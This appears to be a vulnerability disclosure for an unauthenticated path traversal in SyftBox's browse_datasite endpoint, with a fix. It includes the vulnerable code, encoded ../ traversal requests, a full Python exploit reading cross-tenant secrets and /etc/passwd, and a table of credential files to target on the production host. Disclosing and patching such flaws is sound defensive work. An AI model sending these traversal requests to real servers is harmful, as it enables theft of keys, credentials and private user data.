Unauthenticated Path Traversal in SyftBox browse_datasite Endpoint #9404

@AAtomical

Summary

An unauthenticated path-traversal vulnerability in SyftBox's browse_datasite endpoint allows any remote attacker to read arbitrary files on the server's filesystem and access private files inside any other user's datasite (cross-tenant confidentiality breach).

Initial static analysis suggested that served files were gated by a small extension allowlist (.html, .md, .json, .yaml, .log, .txt, .py). End-to-end exploitation showed otherwise: the else fallback at line 126 serves any file as application/octet-stream, so there is no effective extension restriction and every file readable by the server process can be exfiltrated.

The production instance at https://syftbox.openmined.org runs uvicorn directly on 0.0.0.0:8443 with no reverse proxy (confirmed from config/prod/syftbox.service), making it immediately exploitable.


Affected Code

packages/syftbox/syftbox/server/api/v1/main_router.py, lines 88–126:

@main_router.get("/datasites/{path:path}", response_class=HTMLResponse)
async def browse_datasite(
    request: Request,
    path: str,
    server_settings: ServerSettings = Depends(get_server_settings),
) -> HTMLResponse:
    ...
    datasite_part = path.split("/")[0]
    datasites = get_datasites(snapshot_folder)
    if datasite_part in datasites:
        slug = path[len(datasite_part):]
        datasite_path = os.path.join(snapshot_folder, datasite_part)
        datasite_public = datasite_path + "/public"
        ...
        slug_path = os.path.abspath(datasite_public + slug)  # ⚠ no containment check
        if os.path.exists(slug_path) and os.path.isfile(slug_path):
            if slug_path.endswith(".html") or slug_path.endswith(".htm"):
                return FileResponse(slug_path)
            elif slug_path.endswith(".md"):
                ...
            # ... more extension checks ...
            else:
                return FileResponse(slug_path,
                    media_type="application/octet-stream")   # ⚠ catch-all: ANY file served

Proof of Concept — verified end-to-end

All results below come from a fully automated local exploit (exploit_path_traversal.py) run against the real SyftBox code. No production instance was probed.

Attack 1: Cross-tenant private file read (%2e%2e via HTTP)

GET /datasites/victim@corp.com/%2e%2e/private/secrets.yaml HTTP/1.1

→ 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED

An unauthenticated attacker reads another user's private YAML file. The %2e%2e bypasses Starlette's URL normalisation; os.path.abspath resolves it to <snapshot>/victim@corp.com/private/secrets.yaml, outside the public/ directory.
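The path arithmetic behind Attack 1 can be reproduced without a server. The sketch below mirrors the string handling quoted under Affected Code; the function name resolve_like_handler and the /srv/snapshot folder are hypothetical, and posixpath is used so the result is the same on any host (on Linux, os.path is posixpath).

```python
import posixpath


def resolve_like_handler(snapshot_folder: str, path: str) -> str:
    """Mirror the handler's path arithmetic (hypothetical helper, no containment check)."""
    datasite_part = path.split("/")[0]
    slug = path[len(datasite_part):]
    datasite_public = posixpath.join(snapshot_folder, datasite_part) + "/public"
    # abspath collapses ".." segments, so the result can leave public/
    return posixpath.abspath(datasite_public + slug)


# The handler receives the already-decoded path, i.e. "%2e%2e" has become ".."
resolved = resolve_like_handler("/srv/snapshot", "victim@corp.com/../private/secrets.yaml")
print(resolved)  # /srv/snapshot/victim@corp.com/private/secrets.yaml
```

The single ".." cancels the appended "/public" component, which is why one level of traversal is enough to reach a sibling private/ directory.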

Attack 2: Escape all datasites — arbitrary server file read

GET /datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt HTTP/1.1

→ 200 OK
→ TOP SECRET SERVER CONFIG

The ..%2F sequences escape the snapshot directory entirely. The file sensitive.txt was placed in the data folder root, simulating server configuration files.
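As a rough illustration of why the encoded separators matter: under the ASGI specification the path handed to the application is already percent-decoded, so ..%2F arrives at the handler as ../. The sketch below assumes that decoding step and a hypothetical /srv/data/snapshot layout; it is not the server's actual code.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical layout: the snapshot folder sits directly under the data folder.
snapshot_folder = "/srv/data/snapshot"

raw_path = "attacker@evil.com/..%2F..%2F..%2Fsensitive.txt"
decoded = unquote(raw_path)  # what the handler sees as `path`

# Same string handling as the vulnerable handler
datasite_part = decoded.split("/")[0]
slug = decoded[len(datasite_part):]
datasite_public = posixpath.join(snapshot_folder, datasite_part) + "/public"
escaped = posixpath.abspath(datasite_public + slug)

print(decoded)  # attacker@evil.com/../../../sensitive.txt
print(escaped)  # /srv/data/sensitive.txt
```

Three levels of ".." climb out of public/, the attacker's datasite, and the snapshot folder in turn, landing in the data folder root where sensitive.txt was placed.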

Attack 3: System file read — /etc/passwd

Direct handler call with path: attacker@evil.com/../../../../../../../../../../etc/passwd

→ FileResponse serving /etc/passwd
→ ##
→ # User Database
→ ...
→ nobody:*:-2:-2:Unprivileged User...

Attack 4: Raw socket → real uvicorn (production-equivalent)

Hand-crafted HTTP/1.1 with literal ../ sent to a real uvicorn process:

GET /datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml HTTP/1.1
Host: 127.0.0.1:PORT
Connection: close

→ HTTP/1.1 200 OK
→ db_password: hunter2
→ api_key: sk-REDACTED

GET /datasites/attacker@evil.com/[..x10]/etc/passwd HTTP/1.1

→ HTTP/1.1 200 OK
→ ## User Database ...

All four attack vectors succeed with 100% reliability.

Full PoC:

import asyncio, os, signal, socket, subprocess, sys, tempfile, time
from pathlib import Path
from unittest.mock import MagicMock

import httpx
from fastapi import FastAPI
from starlette.testclient import TestClient

from syftbox.server.api.v1.main_router import browse_datasite, main_router
from syftbox.server.settings import ServerSettings, get_server_settings

with tempfile.TemporaryDirectory() as tmp:
    base = Path(tmp)

    (base / "snapshot/attacker@evil.com/public").mkdir(parents=True)
    (base / "snapshot/attacker@evil.com/public/index.html").write_text("<h1>public</h1>")
    (base / "snapshot/victim@corp.com/public").mkdir(parents=True)
    (base / "snapshot/victim@corp.com/private").mkdir(parents=True)
    (base / "snapshot/victim@corp.com/private/secrets.yaml").write_text("db_password: hunter2\napi_key: sk-REDACTED")
    (base / "sensitive.txt").write_text("TOP SECRET SERVER CONFIG")

    settings = ServerSettings(data_folder=base)
    app = FastAPI()
    app.include_router(main_router)
    app.dependency_overrides[get_server_settings] = lambda: settings

    depth = len((base / "snapshot/attacker@evil.com/public").resolve().parts) - 1

    print("=" * 60)
    print(" SyftBox Path Traversal PoC")
    print("=" * 60)

    c = TestClient(app)
    assert c.get("/datasites/attacker@evil.com/index.html").status_code == 200, "baseline broken"
    print("\n[baseline] OK")

    r = c.get("/datasites/victim@corp.com/%2e%2e/private/secrets.yaml")
    print(f"\n[1] cross-tenant via %2e%2e  status={r.status_code}")
    print(f"    {r.text}")

    async def asgi():
        async with httpx.AsyncClient(transport=httpx.ASGITransport(app=app), base_url="http://t") as h:
            r1 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2Fvictim@corp.com%2Fprivate%2Fsecrets.yaml")
            print(f"\n[2] cross-tenant via ..%2F  status={r1.status_code}")
            print(f"    {r1.text}")
            r2 = await h.get("http://t/datasites/attacker@evil.com/..%2F..%2F..%2Fsensitive.txt")
            print(f"\n[3] escape datasites via ..%2F  status={r2.status_code}")
            print(f"    {r2.text}")
    asyncio.run(asgi())

    mock = MagicMock()
    def call(path):
        return asyncio.run(browse_datasite(request=mock, path=path, server_settings=settings))

    def body(result):
        if hasattr(result, "path"):
            return Path(result.path).read_text()
        if hasattr(result, "body"):
            return result.body.decode() if isinstance(result.body, bytes) else str(result.body)
        return str(result)

    r = call("attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
    print(f"\n[4] direct handler cross-tenant")
    print(f"    {body(r)}")

    r = call("attacker@evil.com/../../../sensitive.txt")
    print(f"\n[5] direct handler escape datasites")
    print(f"    {body(r)}")

    r = call("attacker@evil.com/" + "/".join([".."] * depth) + "/etc/passwd")
    b = body(r)
    print(f"\n[6] direct handler /etc/passwd")
    print(f"    {b[:200]}")

    port = 0
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0)); port = s.getsockname()[1]

    app_py = base / "app.py"
    app_py.write_text(
        f"from fastapi import FastAPI\n"
        f"from syftbox.server.api.v1.main_router import main_router\n"
        f"from syftbox.server.settings import ServerSettings, get_server_settings\n"
        f"settings = ServerSettings(data_folder={str(base)!r})\n"
        f"app = FastAPI()\n"
        f"app.include_router(main_router)\n"
        f"app.dependency_overrides[get_server_settings] = lambda: settings\n"
    )

    proc = subprocess.Popen(
        [sys.executable, "-m", "uvicorn", "app:app",
         "--host", "127.0.0.1", "--port", str(port),
         "--log-level", "warning", "--app-dir", str(base)],
        env={**os.environ, "PYTHONPATH": str(Path(__file__).parent / "packages/syftbox")},
        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
    )

    deadline = time.time() + 10
    while time.time() < deadline:
        try:
            socket.create_connection(("127.0.0.1", port), timeout=0.3).close(); break
        except OSError:
            time.sleep(0.2)

    def raw(path):
        s = socket.socket(); s.settimeout(5)
        s.connect(("127.0.0.1", port))
        s.sendall(f"GET {path} HTTP/1.1\r\nHost: 127.0.0.1:{port}\r\nConnection: close\r\n\r\n".encode())
        d = b""
        while True:
            try:
                c = s.recv(4096)
                if not c: break
                d += c
            except socket.timeout: break
        s.close()
        t = d.decode(errors="replace")
        status = t.split("\r\n")[0]
        body = t.split("\r\n\r\n", 1)[1] if "\r\n\r\n" in t else ""
        return status, body

    st, b = raw("/datasites/attacker@evil.com/../../victim@corp.com/private/secrets.yaml")
    print(f"\n[7] raw socket cross-tenant  {st}")
    print(f"    {b[:200]}")

    st, b = raw("/datasites/attacker@evil.com/../../../sensitive.txt")
    print(f"\n[8] raw socket escape datasites  {st}")
    print(f"    {b[:200]}")

    st, b = raw(f"/datasites/attacker@evil.com/{'/'.join(['..'] * depth)}/etc/passwd")
    print(f"\n[9] raw socket /etc/passwd  {st}")
    print(f"    {b[:200]}")

    proc.send_signal(signal.SIGTERM)
    try: proc.wait(timeout=5)
    except subprocess.TimeoutExpired: proc.kill()

    print("\n" + "=" * 60)

Reproduction

cd PySyft/packages/syftbox && pip install -e .
cd ../.. && python3 exploit_path_traversal.py

Impact

Concrete exploitation scenarios on production

| Target file | Traversal | Consequence |
| --- | --- | --- |
| <victim>/private/secrets.yaml | %2e%2e/private/... | Cross-tenant credential theft |
| /etc/letsencrypt/live/syftbox.openmined.org/privkey.pem | Deep ../ | TLS private key → MITM all clients |
| data/file.db | ../../file.db | SQLite database dump → full metadata exfiltration |
| /home/azureuser/.ssh/id_rsa | Deep ../ | SSH key → lateral movement on Azure VM |
| /home/azureuser/.bash_history | Deep ../ | Command history → credential/infra recon |
| server.env / JWT secret on disk | ../../../server.env | JWT forgery → full impersonation |

Remediation

Immediate patch (drop-in replacement for lines 109–126)

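from pathlib import Path

from fastapi import HTTPException  # if not already imported in main_router.py

# Resolve the public root once; strict=True raises FileNotFoundError if it does not exist
datasite_public_real = Path(datasite_public).resolve(strict=True)
# Resolve the requested path (collapsing ".." and following symlinks) before checking it
candidate = (datasite_public_real / slug.lstrip("/")).resolve()

# Containment: resolved path MUST be inside the public directory
# (Path.is_relative_to requires Python 3.9+)
if not candidate.is_relative_to(datasite_public_real):
    raise HTTPException(status_code=403, detail="Forbidden")
if not candidate.is_file():
    raise HTTPException(status_code=404, detail="Not found")

slug_path = str(candidate)
# ... extension-based Content-Type logic unchanged below ...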
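
The containment check can be exercised in isolation before it is wired into the handler. The following is a minimal sketch, assuming Python 3.9+ for Path.is_relative_to; the helper names is_contained and naive_prefix_check and the public_backup directory are hypothetical and exist only for this illustration.

```python
import tempfile
from pathlib import Path


def is_contained(public_dir: Path, slug: str) -> bool:
    """Return True only if slug resolves to a location inside public_dir."""
    root = public_dir.resolve(strict=True)
    candidate = (root / slug.lstrip("/")).resolve()
    return candidate.is_relative_to(root)  # Python 3.9+


def naive_prefix_check(public_dir: Path, slug: str) -> bool:
    """String-prefix comparison, shown only for contrast with is_relative_to."""
    root = public_dir.resolve(strict=True)
    candidate = (root / slug.lstrip("/")).resolve()
    return str(candidate).startswith(str(root))


with tempfile.TemporaryDirectory() as tmp:
    public = Path(tmp) / "snapshot" / "victim@corp.com" / "public"
    public.mkdir(parents=True)
    (public / "index.html").write_text("<h1>public</h1>")

    slugs = [
        "/index.html",                  # legitimate public file
        "/../private/secrets.yaml",     # cross-tenant style traversal
        "/../../../../etc/passwd",      # deep traversal
        "/../public_backup/notes.txt",  # sibling directory sharing the "public" prefix
    ]
    results = {slug: is_contained(public, slug) for slug in slugs}
    sibling_naive = naive_prefix_check(public, "/../public_backup/notes.txt")

for slug, allowed in results.items():
    print(f"{slug!r}: {'allowed' if allowed else 'rejected'}")
print(f"naive prefix check on sibling directory: {sibling_naive}")
```

Only /index.html is allowed. The last case shows why a component-wise comparison is preferable to str.startswith: a sibling directory whose name begins with "public" passes the string-prefix test but is rejected by is_relative_to.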
